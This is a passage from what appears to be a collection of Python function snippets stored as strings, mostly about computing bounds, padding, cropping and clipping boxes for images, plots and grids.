y[..., where[1:-1]] = np.nan\n\n return x, y", "def calculate_min_max_tiles(self):", "def _cell_bounds_xy(self, x, y, dx = None):\n\t\tif dx is None:\n\t\t\tlev = bhpix.get_pixel_level(x, y)\n\t\t\tdx = bhpix.pix_size(lev)\n\t\t\t##dx = bhpix.pix_size(self.level)\n\n\t\tbounds = Polygon.Shapes.Rectangle(dx)\n\t\tbounds.shift(x - 0.5*dx, y - 0.5*dx);\n\n\t\tif fabs(fabs(x) - fabs(y)) == 0.5:\n\t\t\t# If it's a \"halfpixel\", return a triangle\n\t\t\t# by clipping agains the sky\n\t\t\tbounds &= bn.ALLSKY\n\n\t\treturn bounds", "def _filter_img_boxes(boxes, im_info):\n padding = 50\n w_min = -padding\n w_max = im_info[1] + padding\n h_min = -padding\n h_max = im_info[0] + padding\n keep = np.where((w_min <= boxes[:,0]) & (boxes[:,2] <= w_max) & (h_min <= boxes[:,1]) &\n (boxes[:,3] <= h_max))[0]\n return keep", "def sanitize_coordinates(_x1, _x2, img_size: int, padding: int = 0, cast: bool = True):\n _x1 = _x1 * img_size\n _x2 = _x2 * img_size\n if cast:\n _x1 = _x1.long()\n _x2 = _x2.long()\n coordinates_min = P.Minimum()\n coordinates_max = P.Maximum()\n x1 = coordinates_min(_x1, _x2)\n x2 = coordinates_max(_x1, _x2)\n\n select = P.Select()\n zeroslike = P.ZerosLike()\n oneslike = P.OnesLike()\n min_tensor = zeroslike(x1 - padding)\n x1 = select(min_tensor > x1 - padding, min_tensor, x1 - padding)\n\n max_tensor = oneslike(x2 + padding) * img_size\n x2 = select(x2 + padding > max_tensor, max_tensor, x2 + padding)\n\n\n return x1, x2", "def define_grid():\n grid_left = np.array([[-13.1000000000000, -35.5000000000000, -48.3000000000000, -60, -16.9000000000000,\n -34.8000000000000, -67.5000000000000, -46.1000000000000, -59.8000000000000,\n -14.2000000000000, -28.3000000000000, -42.3000000000000, -67.6000000000000,\n -50.5000000000000, -14.6000000000000, -60.9000000000000, -31.6000000000000,\n -5.10000000000000, -65.6000000000000, -41.8000000000000, -55.1000000000000,\n -22.7000000000000, -5.80000000000000, -49.2000000000000, -34.5000000000000,\n -61.5500000000000, -63.6000000000000, -40.4000000000000, -48.7000000000000,\n -21.8000000000000, -58.2000000000000, -7, -36.3000000000000, -48.1000000000000,\n -56.8000000000000, -7.30000000000000, -22.2000000000000, -36.8000000000000,\n -46.8000000000000],\n [-67.7000000000000, -60, -55.1000000000000, -51.8000000000000, -51.6000000000000,\n -49.3000000000000, -47.1000000000000, -43.7000000000000, -39.6000000000000,\n -39.1000000000000, -31.2000000000000, -30.7000000000000, -30.1000000000000,\n -24.4000000000000, -22.7000000000000, -18.7000000000000, -16.9000000000000,\n -12.6000000000000, -10.8000000000000, -10.2000000000000, -4.01000000000000, 1.20000000000000,\n 2.80000000000000, 3.70000000000000, 3.90000000000000, 6.20000000000000, 8.30000000000000,\n 11.8000000000000, 14.5000000000000, 16, 18.2000000000000, 18.4000000000000, 19.9000000000000,\n 24.6000000000000, 28.5200000000000, 33.8000000000000, 35, 35.4000000000000,\n 35.6000000000000],\n [69.1000000000000, 66, 58.2000000000000, 48, 78, 71.7000000000000, 31, 61.1000000000000,\n 53.3000000000000, 81.1000000000000, 76, 70.2000000000000, 41.2000000000000, 64.4000000000000,\n 80.2000000000000, 50.9000000000000, 75.2000000000000, 77.3000000000000, 37.8000000000000, 67,\n 53.2000000000000, 72, 74.8000000000000, 54.7000000000000, 66.5000000000000, 35.9000000000000,\n 25.7000000000000, 60.7000000000000, 50.5000000000000, 68.9000000000000, 27.3000000000000,\n 70.3000000000000, 59.6000000000000, 44, 20.8000000000000, 61.7000000000000, 57.2000000000000,\n 47, 36]])\n stn_left = np.array([[-14.6, -13.2, -11.7, -9.10, -11.7, -13.2, -7.90, -10],\n [-15.1, -15.1, -15.1, -12.6, -12.6, -12.6, -9.40, -10.1],\n [-5.40, -7.20, -8.70, -8.70, -7.50, -5.10, -10.3, -7.80]])\n grid_right = np.copy(grid_left)\n grid_right[0, :] = grid_right[0, :] * -1\n stn_right = np.copy(stn_left)\n stn_right[0, :] = stn_right[0, :] * -1\n\n return grid_left, grid_right, stn_left, stn_right", "def remove_border_vals(img, x: torch.Tensor, y: torch.Tensor, c: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]: \r\n\r\n new_x = img.shape[3] - 8\r\n new_y = img.shape[2] - 8\r\n \r\n mask = x.ge(8) & x.le(new_x) & y.ge(8) & y.le(new_y)\r\n x = torch.masked_select(x, mask)\r\n y = torch.masked_select(y, mask)\r\n c = torch.masked_select(c, mask)\r\n\r\n return x, y, c", "def _clip_tiled_boxes(self, boxes, im_shape):\n assert boxes.shape[1] % 4 == 0, \\\n 'boxes.shape[1] is {:d}, but must be divisible by 4.'.format(\n boxes.shape[1]\n )\n # x1 >= 0\n boxes[:, 0::4] = np.maximum(np.minimum(boxes[:, 0::4], im_shape[1] - 1), 0)\n # y1 >= 0\n boxes[:, 1::4] = np.maximum(np.minimum(boxes[:, 1::4], im_shape[0] - 1), 0)\n # x2 < im_shape[1]\n boxes[:, 2::4] = np.maximum(np.minimum(boxes[:, 2::4], im_shape[1] - 1), 0)\n # y2 < im_shape[0]\n boxes[:, 3::4] = np.maximum(np.minimum(boxes[:, 3::4], im_shape[0] - 1), 0)\n return boxes", "def boundary2(self,image,i,j):\r\n if((j >=725- self.padding) and (j <=875+ self.padding ) and (i >= 200- self.padding) and (i <= 400+ self.padding)):\r\n image[self.maximum_size-i,j,:]=0,0,0\r\n self.image_p[i,j,:]=2", "def crop(img, boundaries):\n minx, miny, maxx, maxy = boundaries\n return img[miny:maxy, minx:maxx]", "def in_bounds(self, x, y):\n return x >= 0 and x < 8 and y >= 0 and y < 8", "def create_grid(xlim, ylim, step):\n x_range = np.arange(xlim[0], xlim[1], step)\n y_range = np.arange(ylim[0], ylim[1], step)\n return x_range, y_range", "def expanded_boundaries(self):\n width = self._points[0][3][0] - self._points[0][1][0]\n height = self._points[0][3][1] - self._points[0][1][1]\n factor = np.multiply((width, height), Window.BORDER)\n return (\n np.subtract(self._points[0][1], factor),\n np.add(self._points[0][3], factor))", "def check_image_size(self, x):\n _, _, h, w = x.size()\n mod_pad_h = (self.window_size -\n h % self.window_size) % self.window_size\n mod_pad_w = (self.window_size -\n w % self.window_size) % self.window_size\n x = F.pad(x, (0, mod_pad_w, 0, mod_pad_h), 'reflect')\n return x", "def get_bounds(self):\n occupied_locations = self.board.keys()\n min_x = min(p[0] for p in occupied_locations)\n max_x = max(p[0] for p in occupied_locations)\n min_y = min(p[1] for p in occupied_locations)\n max_y = max(p[1] for p in occupied_locations)\n return ((min_x, max_x), (min_y, max_y))", "def square_boundaries(px , py, pz, incx, incy, incz, min_x, min_y, min_z, max_x, max_y, max_z):\n\n if px < min_x or px > max_x: \n pcx = px - incx \n\n if py < min_y or py > max_y:\n pcy = py - incy \n\n if pz < min_z or pz > max_z:\n pcz = pz - incz \n\n return pcx, pcy, pcz", "def _bbox_clip(self, bbox, img_h, img_w):\n bbox[0] = bbox[0].clamp(0., img_w)\n bbox[1] = bbox[1].clamp(0., img_h)\n bbox[2] = bbox[2].clamp(10., img_w)\n bbox[3] = bbox[3].clamp(10., img_h)\n return bbox", "def pad_vector_grid(vector_sequences, grid_shape_sequences, max_grid_shape = None, dtype = 'int32', padding = 'pre', truncating = 'pre', value = 0.):\n\t\n row_lengths = [s[0] for s in grid_shape_sequences]\n col_lengths = [s[1] for s in grid_shape_sequences]\n assert vector_sequences[0] is not None \n dim = vector_sequences[0].shape[1] \n nb_samples = len(vector_sequences)\n if max_grid_shape is None:\n max_grid_shape = (np.max(row_lengths), np.max(col_lengths))\n x = np.ones( (nb_samples,)+ max_grid_shape +(dim,)).astype(dtype)* value \n mask = np.zeros((nb_samples,)+max_grid_shape)\n for idx, vs in enumerate(vector_sequences):\n if len(vs) == 0:\n continue\n grid_vec = np.reshape(vs,(tuple(grid_shape_sequences[idx]) + (dim,)) , order='F')\n # testiing code\n #patchRow, patchCol = [25,25]\n #showGrid(grid_vec, grid_shape_sequences[idx], [patchRow, patchCol]) \n if truncating == 'pre': \n trunc = grid_vec[-max_grid_shape[0]:,-max_grid_shape[1]:,:]\n elif truncating == 'post':\n trunc = grid_vec[:max_grid_shape[0],:max_grid_shape[1],:]\n else:\n raise ValueError(\"Truncating type '%s' not understood\" % padding)\n \n if padding == 'post':\n x[idx,:trunc.shape[0],:trunc.shape[1],:] = trunc.copy()\n mask[idx, :trunc.shape[0],:trunc.shape[1]] = 1\n elif padding == 'pre':\n x[idx, -trunc.shape[0]:,-trunc.shape[1]:, :] = trunc.copy()\n mask[idx, -trunc.shape[0]:, -trunc.shape[1]:] = 1\n else:\n raise ValueError(\"PAdding type '%s' not understood\" % padding) \n #showGrid(x[idx,::], max_grid_shape, [patchRow, patchCol]) \n return x , mask# -*- coding: utf-8 -*-", "def _update_limits(self):\n if self.pos_x > self.max_x:\n self.max_x = self.pos_x\n if self.pos_y > self.max_y:\n self.max_y = self.pos_y\n if self.pos_x < self.min_x:\n self.min_x = self.pos_x\n if self.pos_y < self.min_y:\n self.min_y = self.pos_y", "def _xywh2min_max(box):\n x, y, w, h = box\n return np.array([x, y, x+w, y+h])", "def _build_list_of_excluded_pixels2(self, exclude_zones, img_width, img_height):\n \n full_image = numpy.ones((img_height, img_width), dtype=uint8)\n for x, y, width, height in exclude_zones:\n \n # creates a matrix where 0 is placed on pixels to exclude, and 1 on pixel to keep\n exclusion = numpy.zeros((height, width), dtype=uint8)\n exclusion = numpy.pad(exclusion, ((min(y, img_height) , max(0, img_height - (y + height))), (min(x, img_width), max(0, img_width - (x + width)))), constant_values=1)\n \n full_image *= exclusion[0:img_height, 0:img_width] # crop exclusion array if it's size is higher than image (exclusion zone outside of image dimensions)\n \n return full_image", "def limit_roi(roi, im_height, im_width):\r\n left = max(0, roi[0])\r\n top = max(0, roi[1])\r\n right = min(im_width - 1, roi[2])\r\n bottom = min(im_height - 1, roi[3])\r\n\r\n return [left, top, right, bottom]", "def set_lim(x, y, **kws):\n per = kws['per']\n min_per = 50 - per/2\n max_per = per/2 + 50\n xper = np.nanpercentile(x,[min_per,max_per])\n yper = np.nanpercentile(y,[min_per,max_per])\n ax = plt.gca()\n ax.set_xlim(xper)\n ax.set_ylim(yper)", "def boundary_check(limits : tuple, coords : tuple) -> bool:\n xl,xh,yl,yh = limits\n x,y = coords\n bound_x = xl <= x and x < xh\n bound_y = yl <= y and y < yh\n return bound_x and bound_y", "def rescale_axes(self, x=True, y=True, xlim=None, ylim=None, \n tighten_up=0): \n \n # First, figure out what limits should be\n col_xlim = [[1e10, -1e10] for i in range(self.dims[0])]\n row_ylim = [[1e10, -1e10] for i in range(self.dims[1])]\n \n # Loop over axes\n for i in range(self.N):\n if self.grid[i] is None:\n continue\n \n # column, row\n j, k = self.axis_position(i)\n \n if self.above_diagonal(i):\n continue\n \n if x and xlim is None:\n col_xlim[j][0] = min(col_xlim[j][0], self.grid[i].dataLim.min[0])\n col_xlim[j][1] = max(col_xlim[j][1], self.grid[i].dataLim.max[0]) \n elif x:\n col_xlim[j][0] = xlim[0]\n col_xlim[j][1] = xlim[1]\n \n if self.diagonal is not None and i in self.diag:\n continue\n \n if y and (ylim is None): \n row_ylim[k][0] = min(row_ylim[k][0], self.grid[i].dataLim.min[1])\n row_ylim[k][1] = max(row_ylim[k][1], self.grid[i].dataLim.max[1]) \n elif y:\n row_ylim[k][0] = ylim[0]\n row_ylim[k][1] = ylim[1] \n \n # Apply limits \n for i in range(self.N):\n if self.grid[i] is None:\n continue\n \n # column, row \n j, k = self.axis_position(i)\n \n col_tmp = [col_xlim[j][0] * (1. + tighten_up * np.sign(col_xlim[j][0])),\n col_xlim[j][1] * (1. - tighten_up * np.sign(col_xlim[j][1]))]\n \n row_tmp = [row_ylim[k][0] * (1. + tighten_up * np.sign(row_ylim[k][0])),\n row_ylim[k][1] * (1. - tighten_up * np.sign(row_ylim[k][1]))]\n\n # Kludge\n if np.all(np.isfinite(col_tmp)):\n self.grid[i].set_xlim(col_tmp)\n \n if self.diagonal and i in self.diag:\n continue\n\n if np.all(np.isfinite(row_tmp)):\n self.grid[i].set_ylim(row_tmp)\n\n pl.draw()", "def bounds(self):\n return self.xmin, self.xmax, self.ymin, self.ymax", "def get_limits(self, idx):\n if idx < self.nb_sub_images - 1:\n pixel_step = self.window_size - self.recovery\n\n return idx * pixel_step, idx * pixel_step + self.window_size\n elif idx == self.nb_sub_images - 1:\n return - self.window_size, None\n else:\n return None, None", "def make_tiles_limits(im, n_splits, margin=0):\n \n if n_splits == 1:\n return [0, im.shape[1], 0, im.shape[0]]\n # number of splits per axis\n ax_splits = int(np.log2(n_splits))\n x_segments = split_range(im.shape[1], ax_splits)\n y_segments = split_range(im.shape[0], ax_splits)\n \n if margin > 0:\n x_segments = extend_indices(x_segments, margin=margin)\n y_segments = extend_indices(y_segments, margin=margin)\n \n # make combinations of [xmin, xmax, ymin, ymax] indices of tiles\n tiles_indices = []\n for xlim in x_segments:\n for ylim in y_segments:\n tiles_indices.append(xlim + ylim)\n return tiles_indices", "def internal_bounds(self) -> tuple[float, float, float, float]:\n xres, yres = self.res\n w, s, e, n = self.bounds\n y0, y1 = (n, s) if yres < 0 else (s, n)\n x0, x1 = (e, w) if xres < 0 else (w, e)\n return x0, y0, x1, y1", "def canvas_bounds(self) -> utils.BoxRegion:", "def checkCanvasBoundsAndWrap(self):\n #check along the x axis\n if (self.xPos<0):\n self.setXPos(self.canvasIGetDrawnOnsWidth)\n \n elif (self.xPos>self.canvasIGetDrawnOnsWidth):\n self.setXPos(0)\n #check along the y axis\n if (self.yPos<0):\n self.setYPos(self.canvasIGetDrawnOnsHeight)\n \n elif (self.yPos>self.canvasIGetDrawnOnsHeight):\n self.setYPos(0)", "def get_padding_sizes(self, div, dim):\n # ghost cells in the y direction\n target_shape = div * np.ceil(dim / div)\n target_shape_diff = target_shape - dim\n\n pad_low = int(np.ceil(target_shape_diff / 2.0))\n pad_high = int(np.floor(target_shape_diff / 2.0))\n\n return pad_low, pad_high", "def _edit_border_tiles(self, vmf: VMF, seg_min: Vec, seg_max: Vec, border: bool, blacken: bool) -> None:\n up = abs(self.up_axis)\n forward = (seg_max - seg_min).norm()\n norm_dir = self.normal().axis()\n\n tiledefs_up: list[tiling.TileDef] = []\n tiledefs_dn: list[tiling.TileDef] = []\n\n overlay_len = int((seg_max - seg_min).mag())\n\n # We need to snap the axis normal_axis to the grid, since it could\n # be forward or back.\n min_pos = seg_min.copy()\n min_pos[norm_dir] = min_pos[norm_dir] // 128 * 128 + 64\n\n u_ax, v_ax = Vec.INV_AXIS[up.axis()]\n side_dir = Vec.dot(abs(Vec.cross(up, forward)), seg_min - min_pos)\n side_ind = round((side_dir + 48) / 32, 2) # 0/1/2/3 for the center of tiles.\n # 4.5 -> [4, 5] and 4 -> [4].\n pos_iter = sorted({round(side_ind - 0.25), round(side_ind + 0.25)})\n if u_ax == forward.axis():\n uv_pos = [\n (u, v)\n for u in range(4)\n for v in pos_iter\n ]\n elif v_ax == forward.axis():\n uv_pos = [\n (u, v)\n for u in pos_iter\n for v in range(4)\n ]\n else: # Should be impossible?\n uv_pos = []\n\n for offset in range(64, overlay_len, 128):\n # Each position on top or bottom, inset 64 from each end.\n # First check if the tiles themselves are present, then check if any of the\n # subtiles are present - blackening on the way if required.\n pos = min_pos + offset * forward\n tile_cat = []\n try:\n top_tile = tiling.TILES[\n (pos + 128 * up).as_tuple(),\n (-up).as_tuple()\n ]\n except KeyError:\n pass\n else:\n tile_cat.append((tiledefs_up, top_tile))\n try:\n btm_tile = tiling.TILES[\n (pos - 128 * up).as_tuple(),\n up.as_tuple()\n ]\n except KeyError:\n pass\n else:\n tile_cat.append((tiledefs_dn, btm_tile))\n for tiledefs, tile in tile_cat:\n found = False\n for u, v in uv_pos:\n subtile = tile[u, v]\n if subtile.is_tile:\n found = True\n if blacken:\n tile[u, v] = subtile.as_black\n if found:\n tiledefs.append(tile)\n\n if not border or (not tiledefs_up and not tiledefs_dn):\n return\n\n overlay_thickness = options.get(int, 'fizz_border_thickness')\n overlay_repeat = options.get(int, 'fizz_border_repeat')\n flip_uv = options.get(bool, 'fizz_border_vertical')\n\n if flip_uv:\n u_rep = 1.0\n v_rep = overlay_len / overlay_repeat\n else:\n u_rep = overlay_len / overlay_repeat\n v_rep = 1.0\n\n cent_pos = (seg_min + seg_max) / 2\n\n if tiledefs_up:\n over = srctools.vmf.make_overlay(\n vmf,\n normal=-up,\n origin=cent_pos + 64 * up,\n uax=forward * overlay_len,\n vax=Vec.cross(up, forward) * overlay_thickness,\n material=texturing.SPECIAL.get(cent_pos + 64 * up, 'fizz_border'),\n surfaces=[],\n u_repeat=u_rep,\n v_repeat=v_rep,\n swap=flip_uv,\n )\n for tile in tiledefs_up:\n tile.bind_overlay(over)\n\n if tiledefs_dn:\n over = srctools.vmf.make_overlay(\n vmf,\n normal=up,\n origin=cent_pos - 64 * up,\n uax=forward * overlay_len,\n vax=Vec.cross(-up, forward) * overlay_thickness,\n material=texturing.SPECIAL.get(cent_pos - 64 * up, 'fizz_border'),\n surfaces=[],\n u_repeat=u_rep,\n v_repeat=v_rep,\n swap=flip_uv,\n )\n for tile in tiledefs_dn:\n tile.bind_overlay(over)", "def clip_boxes(boxes, im_shape):\n boxes[:, 0::4] = np.maximum(np.minimum(boxes[:, 0::4], im_shape[1] - 1), 0) # x1 >= 0\n boxes[:, 1::4] = np.maximum(np.minimum(boxes[:, 1::4], im_shape[0] - 1), 0) # y1 >= 0\n boxes[:, 2::4] = np.maximum(np.minimum(boxes[:, 2::4], im_shape[1] - 1), 0) # x2 < im_shape[1]\n boxes[:, 3::4] = np.maximum(np.minimum(boxes[:, 3::4], im_shape[0] - 1), 0) # y2 < im_shape[0]\n return boxes", "def pad(self):\n if self._mg_problem.boundaries[0] == 'periodic':\n # left side\n self.left[:] = self.mid[-self.borders[0]:]\n # right side\n self.right[:] = self.mid[:self.borders[1]]\n elif self._mg_problem.boundaries[0] == 'dirichlet':\n\n # left from border\n l_f_b = self.space_tensor[0:self.borders[0]]\n # right_from_border\n r_f_b = self.space_tensor[-self.borders[1]:]\n # left side\n self.left[:] = self.fl(l_f_b)\n # right side\n self.right[:] = self.fr(r_f_b)", "def pad_bounds(\n bounds: tuple[int, int, int, int],\n padding: int | tuple[int, int] | tuple[int, int, int, int],\n) -> tuple[int, int, int, int]:\n if np.size(bounds) % 2 != 0:\n msg = \"Bounds must have an even number of elements.\"\n raise ValueError(msg)\n ndims = np.size(bounds) // 2\n\n if np.size(padding) not in [1, 2, np.size(bounds)]:\n msg = \"Invalid number of padding elements.\"\n raise ValueError(msg)\n\n if np.size(padding) == 1 or np.size(padding) == np.size(bounds):\n pass\n elif np.size(padding) == ndims: # pragma: no cover\n padding = np.tile(padding, 2)\n\n signs = np.repeat([-1, 1], ndims)\n return np.add(bounds, padding * signs)", "def pad(img, pad_size=32):\n\n if pad_size == 0:\n return img\n\n height, width = img.shape[:2]\n\n if height % pad_size == 0:\n y_min_pad = 0\n y_max_pad = 0\n else:\n y_pad = pad_size - height % pad_size\n y_min_pad = int(y_pad / 2)\n y_max_pad = y_pad - y_min_pad\n\n if width % pad_size == 0:\n x_min_pad = 0\n x_max_pad = 0\n else:\n x_pad = pad_size - width % pad_size\n x_min_pad = int(x_pad / 2)\n x_max_pad = x_pad - x_min_pad\n\n img = cv2.copyMakeBorder(img, y_min_pad, y_max_pad, x_min_pad, x_max_pad, cv2.BORDER_REFLECT_101)\n\n return img, (x_min_pad, y_min_pad, x_max_pad, y_max_pad)", "def view_limits(self, dmin, dmax):\n base = self._select_base(dmin, dmax)\n if mpl.rcParams['axes.autolimit_mode'] == 'round_numbers':\n vmin = base.le(dmin)\n vmax = base.ge(dmax)\n if vmin == vmax:\n vmin -= 1\n vmax += 1\n else:\n vmin = dmin\n vmax = dmax\n\n return mtransforms.nonsingular(vmin, vmax)", "def bounds(self) -> Tensor:\n return torch.cat([self.mins, self.mins + self.ranges], dim=-2)", "def __check_bbox_area(min_y, min_x, max_y, max_x, delta=0.05):\n height = max_y - min_y\n width = max_x - min_x\n\n def __adjust_bbox_boundaries(min_coord, max_coord):\n # Make sure max is never 0 and min is never 1.\n max_coord = tf.maximum(max_coord, 0.0 + delta)\n min_coord = tf.minimum(min_coord, 1.0 - delta)\n return min_coord, max_coord\n\n min_y, max_y = tf.cond(tf.equal(height, 0.0),\n lambda: __adjust_bbox_boundaries(min_y, max_y),\n lambda: (min_y, max_y))\n min_x, max_x = tf.cond(tf.equal(width, 0.0),\n lambda: __adjust_bbox_boundaries(min_x, max_x),\n lambda: (min_x, max_x))\n return min_y, min_x, max_y, max_x", "def _mask_grid(self):\n xg, yg = self._build_grid()\n mask = self._build_mask(xg, yg)\n mask = mask.reshape(xg.shape)\n\n return xg, yg, mask", "def handle_bad_corners(left, right, top, bottom, im_w, im_h):\n left = np.maximum(0, left)\n top = np.maximum(0, top)\n right = np.minimum(im_w, right)\n bottom = np.minimum(im_h, bottom) \n return (left, right, top, bottom)", "def getbbox(self):\r\n img_ = (self._instance > 0)\r\n rows = np.any(img_, axis=1)\r\n cols = np.any(img_, axis=0)\r\n rmin, rmax = np.argmax(rows), img_.shape[0] - 1 - np.argmax(np.flipud(rows))\r\n cmin, cmax = np.argmax(cols), img_.shape[1] - 1 - np.argmax(np.flipud(cols))\r\n return (rmin, rmax, cmin, cmax)", "def bounding_box(self, grid=1):\n supp = self.support\n grid = [np.linspace(s[0], s[1], grid+1) for s in supp]\n X = self.grid_eval(grid)\n X.shape = (-1, self.dim)\n return tuple((X[:, d].min(), X[:, d].max()) for d in range(self.dim))", "def make_grid_bbox(tensor, box, nrow=8, padding=2,\n normalize=False, range=None, \n scale_each=False, pad_value=0, draw_line=False):\n\n # make the mini-batch of images into a grid\n # nmaps = tensor.size(0)\n nmaps = len(box)\n xmaps = min(nrow, nmaps)\n ymaps = int(math.ceil(float(nmaps) / xmaps))\n # height, width = int(tensor.size(2) + padding), int(tensor.size(3) + padding)\n height, width = int(256 + padding), int(256 + padding)\n tensor = torch.ones(())\n grid = tensor.new_full((3, height * ymaps + padding, width * xmaps + padding), pad_value)\n # # add the white image into the grid\n # block = tensor.new_full((3, height - padding, width - padding), 9.0/13)\n k = 0\n for y in irange(ymaps):\n for x in irange(xmaps):\n if k >= nmaps:\n break\n # add the white image into the grid\n block = tensor.new_full((3, height - padding, width - padding), 9.0/13)\n # print(box[0].size())\n # print(box[1].size())\n # assert False\n # num_curr_box = box[0][k].size(0)\n num_curr_box = box[k][0].size(0)\n for z in irange(num_curr_box):\n # label = box[1][k][z].item()\n try:\n label = box[k][1][z].item()\n except:\n print(box)\n print(k)\n assert False\n \n if label != -1:\n block = draw_box(block, box[k][0][z], label, draw_line)\n # print(k, z)\n else:\n break\n # copy to the grid\n grid.narrow(1, y * height + padding, height - padding)\\\n .narrow(2, x * width + padding, width - padding)\\\n .copy_(block)\n k = k + 1\n return grid", "def map_grid_loc_to_pixel((grid, x, y), panel_dimensions = bm_panel_dimensions, xc = 17.25, yc = 630, run = 17.25):\n x_offset = 0\n for panel_index, panel_dim in panel_dimensions.iteritems():\n if panel_index < grid:\n width, height = panel_dim\n x_offset += width*xc\n xp, yp = xc + x*run + x_offset, yc - y*run\n return (xp, yp)", "def GetNiceExtentsBySpacing(minval,maxval,spacing,tolerance):\n pass", "def limits(self):\n\n\t\treturn [\n\t\t\tmin(self.xvalues),\n\t\t\tmax(self.xvalues),\n\t\t\tmin(self.yvalues),\n\t\t\tmax(self.yvalues)]", "def bounds(lines):\n min_x = bench_util.Max\n min_y = bench_util.Max\n max_x = bench_util.Min\n max_y = bench_util.Min\n \n for line in lines.itervalues():\n for x, y in line:\n min_x = min(min_x, x)\n min_y = min(min_y, y)\n max_x = max(max_x, x)\n max_y = max(max_y, y)\n \n return ((min_x, min_y), (max_x, max_y))", "def get_roi_limits(self):\n wdet,hdet=self.get_detector_size()\n hlims,vlims=self._get_roi_limits()\n hbin,vbin=self._truncate_roi_binning(wdet,hdet)\n min_roi=(0,0,hlims[0],vlims[0],1,1)\n max_roi=(wdet-hlims[0],wdet-vlims[0],wdet,hdet,hbin,vbin)\n return (min_roi,max_roi)", "def fudgePlotLimits(x,y,marfrac=0.1):\n xl = np.min(x); yl = np.min(y)\n xh = np.max(x); yh = np.max(y)\n dx = xh-xl; dy = yh-yl\n plt.xlim(xl-dx*marfrac,xh+dx*marfrac)\n plt.ylim(yl-dy*marfrac,yh+dy*marfrac)", "def pad(self, nxp, nyp):\n assert (nxp > self.nx)\n assert (nyp > self.ny)\n assert (np.mod(nxp - self.nx, 2) == 0)\n assert (np.mod(nyp - self.ny, 2) == 0)\n\n ret = rmap(nx=nxp, dx=self.dx, ny=nyp, dy=self.dy)\n ret.map[(nyp - self.ny) / 2:(nyp + self.ny) / 2, (nxp - self.nx) / 2:(\n nxp + self.nx) / 2] = self.map\n return ret", "def extend_to_grid(self, resolution):\n return Bounds(\n min_value = math.floor(self.min/resolution)*resolution,\n max_value = math.ceil(self.max/resolution)*resolution\n )", "def center_crop2fixed_pad(im, masks, mask, boxes, classes, target_width, target_height, min_size=2):\n\n h, w, c = im.shape\n ir, tr = float(h) / w, float(target_height) / target_width\n if ir > tr:\n borderw, borderh = int((h / tr - w) / 2), 0\n else:\n borderh, borderw = int((w * tr - h) / 2), 0\n\n im = cv2.copyMakeBorder(im, borderh, borderh, borderw, borderw, cv2.BORDER_CONSTANT, value=[103, 116, 123])\n mask = cv2.copyMakeBorder(mask, borderh, borderh, borderw, borderw, cv2.BORDER_CONSTANT, value=[0])\n n = masks.shape[0]\n if n > 1:\n masks = [cv2.copyMakeBorder(m, borderh, borderh, borderw, borderw, cv2.BORDER_CONSTANT, value=[0]) for m in masks]\n masks = np.asarray(masks)\n elif n == 1:\n masks = cv2.copyMakeBorder(masks.reshape([h, w]), borderh, borderh, borderw, borderw, cv2.BORDER_CONSTANT, value=[0])\n masks = masks[np.newaxis, :, :]\n\n boxes[:, 0] = boxes[:, 0] + borderw\n boxes[:, 1] = boxes[:, 1] + borderh\n boxes[:, 2] = boxes[:, 2] + borderw\n boxes[:, 3] = boxes[:, 3] + borderh\n\n scale = float(target_height) / im.shape[0]\n im = cv2.resize(im, (target_width, target_height))\n mask = cv2.resize(mask, (target_width, target_height), interpolation=cv2.INTER_NEAREST)\n\n flip = np.random.uniform() > 0.5\n if flip:\n im = cv2.flip(im, 1)\n mask = cv2.flip(mask, 1)\n\n if masks.size > 0:\n masks = np.transpose(masks, (1, 2, 0)) # to (h, w, n)\n masks = cv2.resize(masks, (target_width, target_height), interpolation=cv2.INTER_NEAREST)\n if flip:\n masks = cv2.flip(masks, 1)\n try:\n if masks.ndim > 2:\n masks = np.transpose(masks, (2, 0, 1)) # to (n, h, w)\n else:\n masks = masks.reshape((1, target_height, target_width))\n except ValueError:\n print (masks.ndim, masks.shape)\n raise\n else:\n masks = np.zeros((0, target_height, target_width), masks.dtype)\n\n # bboxes\n boxes = _offset_boxes(boxes, [target_height, target_width], scale, [0, 0], flip)\n boxes, classes, masks = _filter_invalid_boxes(boxes, classes, masks, min_size=min_size)\n return im, masks, mask, boxes, classes", "def decision_boundary(self, w, min_x, max_x):\n if np.size(w) < 3:\n w = np.append(w, np.zeros(1))\n x = np.array([min_x, max_x])\n y = -1 * ((w[0] * x) - w[2]) / w[1]\n return x, y", "def compute_bounds(self, space):\n bounds = np.zeros((len(space), 2))\n\n for idx, param in enumerate(space):\n\n if TYPE[param[\"type\"]] is TYPE.FLOAT or \\\n TYPE[param[\"type\"]] is TYPE.INTEGER:\n bounds[idx] = (param[\"min\"], param[\"max\"])\n\n elif TYPE[param[\"type\"]] is TYPE.DISCRETE or \\\n TYPE[param[\"type\"]] is TYPE.DISCRETE:\n bounds[idx] = (0, len(param['values']))\n\n return bounds", "def get_bounding_box(img):\n rows = np.any(img, axis=1)\n cols = np.any(img, axis=0)\n rmin, rmax = np.where(rows)[0][[0, -1]]\n cmin, cmax = np.where(cols)[0][[0, -1]]\n # due to python indexing, need to add 1 to max\n # else accessing will be 1px in the box, not out\n rmax += 1\n cmax += 1\n return [rmin, rmax, cmin, cmax]", "def test_calc_bbox():\n with xr.open_rasterio(TEST_RASTER_PATH) as src:\n xr_res = ds.utils.calc_res(src)\n xr_bounds = ds.utils.calc_bbox(src.x.values, src.y.values, xr_res)\n with rasterio.open(TEST_RASTER_PATH) as src:\n rio_bounds = src.bounds\n assert np.allclose(xr_bounds, rio_bounds, atol=1.0) # allow for absolute diff of 1.0", "def _xywh2cs(self, x, y, w, h, padding=1.25):\n aspect_ratio = self.ann_info['image_size'][0] / self.ann_info[\n 'image_size'][1]\n center = np.array([x + w * 0.5, y + h * 0.5], dtype=np.float32)\n\n if (not self.test_mode) and np.random.rand() < 0.3:\n center += 0.4 * (np.random.rand(2) - 0.5) * [w, h]\n\n if w > aspect_ratio * h:\n h = w * 1.0 / aspect_ratio\n elif w < aspect_ratio * h:\n w = h * aspect_ratio\n\n # pixel std is 200.0\n scale = np.array([w / 200.0, h / 200.0], dtype=np.float32)\n # padding to include proper amount of context\n scale = scale * padding\n\n return center, scale", "def crop(self, xdiv, ydiv, img, bBoxes=None):\n xstride = img.shape[1] // xdiv\n ystride = img.shape[0] // ydiv\n\n widthLimits = np.zeros((xdiv+1,), dtype=np.int32)\n heightLimits = np.zeros((ydiv+1), dtype=np.int32)\n croppedImages = [[] for _ in range(xdiv*ydiv)]\n croppedBoxes = [[] for _ in range(xdiv*ydiv)]\n index = 0\n for x in range(0, img.shape[1]+1, xstride):\n widthLimits[index] = 